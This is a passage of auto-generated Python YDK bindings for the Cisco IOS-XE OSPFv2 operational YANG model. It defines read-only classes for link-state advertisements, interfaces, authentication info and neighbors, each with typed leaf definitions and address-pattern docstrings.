attribute:: network_attached_routers Network attached routers **type**\: list of int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, self).__init__() self.yang_name = "network-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])), ('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])), ]) self.network_lsa_mask = None self.network_attached_routers = [] self._segment_path = lambda: "network-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value) class NetworkSummaryLsa(Entity): """ The network summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, self).__init__() self.yang_name = "network-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "network-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "network-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class RouterSummaryLsa(Entity): """ The router summary Link State Advertisements .. attribute:: summary_lsa_mask The summary Link State Advertisement mask **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: summary_topo The summary topology **type**\: list of :py:class:`SummaryTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, self).__init__() self.yang_name = "router-summary-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("summary-topo", ("summary_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo))]) self._leafs = OrderedDict([ ('summary_lsa_mask', (YLeaf(YType.uint32, 'summary-lsa-mask'), ['int'])), ]) self.summary_lsa_mask = None self.summary_topo = YList(self) self._segment_path = lambda: "router-summary-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa, ['summary_lsa_mask'], name, value) class SummaryTopo(Entity): """ The summary topology .. attribute:: mt_id Multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. 
attribute:: topo_metric Topology Metric **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, self).__init__() self.yang_name = "summary-topo" self.yang_parent_name = "router-summary-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ]) self.mt_id = None self.topo_metric = None self._segment_path = lambda: "summary-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa.SummaryTopo, ['mt_id', 'topo_metric'], name, value) class ExternalLsa(Entity): """ The external Link State Advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, self).__init__() self.yang_name = "external-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "external-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "external-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class NssaLsa(Entity): """ The Not So Stubby Area Link state advertisements .. attribute:: external_lsa_mask The mask for the external Link State Advertisement **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: external_topo The external topology Link State Advertisement **type**\: list of :py:class:`ExternalTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, self).__init__() self.yang_name = "nssa-lsa" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("external-topo", ("external_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo))]) self._leafs = OrderedDict([ ('external_lsa_mask', (YLeaf(YType.uint32, 'external-lsa-mask'), ['int'])), ]) self.external_lsa_mask = None self.external_topo = YList(self) self._segment_path = lambda: "nssa-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa, ['external_lsa_mask'], name, value) class ExternalTopo(Entity): """ The external topology Link State Advertisement .. attribute:: mt_id The multi topology identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: topo_metric_type The topoligy metric type associated with the Link State Advertisement **type**\: :py:class:`OspfExternalMetricType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfExternalMetricType>` **config**\: False .. attribute:: topo_metric The topology metric **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: topo_forwarding_address The topology forwarding address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: topo_route_tag The topology route tag **type**\: int **range:** 0..4294967295 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, self).__init__() self.yang_name = "external-topo" self.yang_parent_name = "nssa-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])), ('topo_metric_type', (YLeaf(YType.enumeration, 'topo-metric-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfExternalMetricType', '')])), ('topo_metric', (YLeaf(YType.uint32, 'topo-metric'), ['int'])), ('topo_forwarding_address', (YLeaf(YType.str, 'topo-forwarding-address'), ['str','str'])), ('topo_route_tag', (YLeaf(YType.uint32, 'topo-route-tag'), ['int'])), ]) self.mt_id = None self.topo_metric_type = None self.topo_metric = None self.topo_forwarding_address = None self.topo_route_tag = None self._segment_path = lambda: "external-topo" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value) class Ospfv2Interface(Entity): """ A list of interfaces that belong to the area .. attribute:: name (key) Name of the interface **type**\: str **config**\: False .. attribute:: network_type Network type **type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>` **config**\: False .. 
attribute:: enable If the interface is enabled **type**\: bool **config**\: False .. attribute:: passive If the interface is in passive mode **type**\: bool **config**\: False .. attribute:: demand_circuit If this is a demand circuit **type**\: bool **config**\: False .. attribute:: mtu_ignore If the MTU is being ignored **type**\: bool **config**\: False .. attribute:: prefix_suppresion If prefix suppression is enabled **type**\: bool **config**\: False .. attribute:: cost The OSPFv2 cost **type**\: int **range:** 0..65535 **config**\: False .. attribute:: hello_interval The hello interval in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: dead_interval The dead interval in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: retransmit_interval The retransmit interval in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: transmit_delay The delay before transmitting a keepalive in seconds **type**\: int **range:** 0..65535 **config**\: False .. attribute:: hello_timer The current hello timer in seconds **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: wait_timer The wait timer in seconds **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: dr The designated router identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: bdr The backup designated router identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: dr_ip The address of the designated router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? 
**type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr_ip The address of the backup designated router **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: state The current state of the interface **type**\: :py:class:`Ospfv2IntfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2IntfState>` **config**\: False .. attribute:: ttl_security_val The TTL security information **type**\: :py:class:`TtlSecurityVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal>` **config**\: False .. attribute:: auth_val The authentication information **type**\: :py:class:`AuthVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal>` **config**\: False .. 
attribute:: ospfv2_neighbor All the neighbors on the interface **type**\: list of :py:class:`Ospfv2Neighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__() self.yang_name = "ospfv2-interface" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])), ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])), ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])), ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])), ('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])), ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])), ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])), ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])), ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])), ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])), ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])), ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])), ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])), ('bdr', 
(YLeaf(YType.uint32, 'bdr'), ['int'])), ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])), ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])), ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])), ]) self.name = None self.network_type = None self.enable = None self.passive = None self.demand_circuit = None self.mtu_ignore = None self.prefix_suppresion = None self.cost = None self.hello_interval = None self.dead_interval = None self.retransmit_interval = None self.transmit_delay = None self.hello_timer = None self.wait_timer = None self.dr = None self.bdr = None self.dr_ip = None self.bdr_ip = None self.state = None self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal() self.ttl_security_val.parent = self self._children_name_map["ttl_security_val"] = "ttl-security-val" self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal() self.auth_val.parent = self self._children_name_map["auth_val"] = "auth-val" self.ospfv2_neighbor = YList(self) self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value) class TtlSecurityVal(Entity): """ The TTL security information .. attribute:: enable Indicates whether time to live security is enabled **type**\: bool **config**\: False .. 
attribute:: hops Number of hops for time to live security **type**\: int **range:** \-2147483648..2147483647 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__() self.yang_name = "ttl-security-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])), ('hops', (YLeaf(YType.int32, 'hops'), ['int'])), ]) self.enable = None self.hops = None self._segment_path = lambda: "ttl-security-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value) class AuthVal(Entity): """ The authentication information .. attribute:: no_auth No authentication in use **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: auth_key Trailer key chain information **type**\: :py:class:`AuthKey <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey>` **config**\: False .. 
attribute:: key_chain Trailer key information **type**\: :py:class:`KeyChain <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__() self.yang_name = "auth-val" self.yang_parent_name = "ospfv2-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))]) self._leafs = OrderedDict([ ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])), ]) self.no_auth = None self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey() self.auth_key.parent = self self._children_name_map["auth_key"] = "auth-key" self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain() self.key_chain.parent = self self._children_name_map["key_chain"] = "key-chain" self._segment_path = lambda: "auth-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value) class AuthKey(Entity): """ Trailer key chain information .. attribute:: key_id The key identifier **type**\: int **range:** 0..255 **config**\: False .. attribute:: key_string The key string **type**\: list of int **range:** 0..255 **config**\: False .. 
attribute:: crypto_algo The algorithm in use **type**\: :py:class:`Ospfv2CryptoAlgorithm <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2CryptoAlgorithm>` **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__() self.yang_name = "auth-key" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])), ('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])), ('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])), ]) self.key_id = None self.key_string = [] self.crypto_algo = None self._segment_path = lambda: "auth-key" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value) class KeyChain(Entity): """ Trailer key information .. 
attribute:: key_chain The key chain **type**\: list of int **range:** 0..255 **config**\: False """ _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__() self.yang_name = "key-chain" self.yang_parent_name = "auth-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])), ]) self.key_chain = [] self._segment_path = lambda: "key-chain" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value) class Ospfv2Neighbor(Entity): """ All the neighbors on the interface .. attribute:: nbr_id (key) The neighbor identifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: address Neighbor address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: dr The neighbor's Designated Router indentifier **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: bdr The neighbor's Backup Designated Router identifier **type**\: int **range:** 0..4294967295 **config**\: False .. 
attribute:: dr_ip The designated routers' IP address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: bdr_ip The backup designated routers' IP address **type**\: union of the below types: **type**\: str **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? **type**\: str **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)? **config**\: False .. attribute:: event_count A count of neighbor events **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: retrans_count A count of the retransmission events **type**\: int **range:** 0..4294967295 **config**\: False .. attribute:: state The current neighbor state **type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>` **config**\: False .. 
